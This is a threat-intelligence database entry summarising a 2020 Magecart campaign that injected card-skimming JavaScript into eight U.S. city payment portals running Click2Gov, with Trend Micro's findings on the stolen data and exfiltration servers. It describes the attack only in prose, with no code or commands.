Cyber Incident Victim: United States of America
Date:
Apr 2020
Location:
United States of America
Summary
A Magecart attack compromised eight U.S. municipal websites utilizing Click2Gov payment software, injecting malicious JavaScript to steal credit card details, expiration dates, CVV codes, names, and addresses during online transactions. The skimmer, lacking obfuscation, intercepted form submissions and exfiltrated data to two servers, with five affected cities having experienced prior breaches involving the same software. Researchers identified no technical links to earlier incidents but noted ongoing threats from Magecart targeting government entities, following previous breaches of academic, hospitality, and commercial sectors. The attack exploited unpatched vulnerabilities in the payment portal infrastructure, though vendor remediation status remained unclear.
| CIA Posture | Motives | Tactics, Techniques & Procedures |
|---|---|---|
| Available to members | 2 motives | 2 techniques |
| Threat Actor | Type | Location |
|---|---|---|
| 1 actor | Available to members | Available to members |
Description
On or around April 10, 2020, threat actors compromised the websites of eight U.S. cities across three states by injecting Magecart credit card skimmers into municipal payment portals utilizing Click2Gov software. The attackers targeted self-service bill-paying systems operated by utilities and community development organizations, specifically focusing on online transactions such as parking ticket payments. Researchers from Trend Micro identified that malicious JavaScript code was inserted into the payment pages of affected city websites, activating when victims accessed these pages to submit payments. The skimmer operated by hooking into the payment form's 'submit' event, capturing entered data immediately upon form submission. Stolen information included credit card numbers, expiration dates, CVV codes, cardholder names, and contact addresses. The attackers exfiltrated this data via HTTP POST requests to two remote servers—one server received data from three compromised city sites, while the other handled data from the remaining five. Forensic analysis revealed the skimmers lacked advanced obfuscation or anti-debugging techniques, indicating a relatively unsophisticated implementation despite its effectiveness.
The incident impacted municipalities that had previously experienced Click2Gov-related breaches in 2018 and 2019, with five of the eight affected cities having been compromised in prior attacks. Trend Micro confirmed the skimming activity remained active as of June 2020 but did not disclose whether any cities had removed the malicious code. Researchers identified no technical connections between this campaign and earlier breaches, though all incidents involved exploitation of Click2Gov payment systems. Previous breaches were attributed to municipalities failing to patch a known 2017 vulnerability in Click2Gov, but the 2020 attack vector was not explicitly linked to unpatched software. CentralSquare Technologies, formed through Superion's 2018 merger and responsible for Click2Gov, did not publicly respond to inquiries about the incident. The attackers exclusively targeted Click2Gov payment forms, distinguishing this campaign from broader Magecart operations that typically skim diverse website payment systems. Trend Micro notified affected cities but withheld their identities, citing a policy against naming victims to prioritize remediation. Analysis of server infrastructure found no overlap with infrastructure from prior breaches, though the reuse of previously compromised cities suggested ongoing targeting of vulnerable municipal payment portals.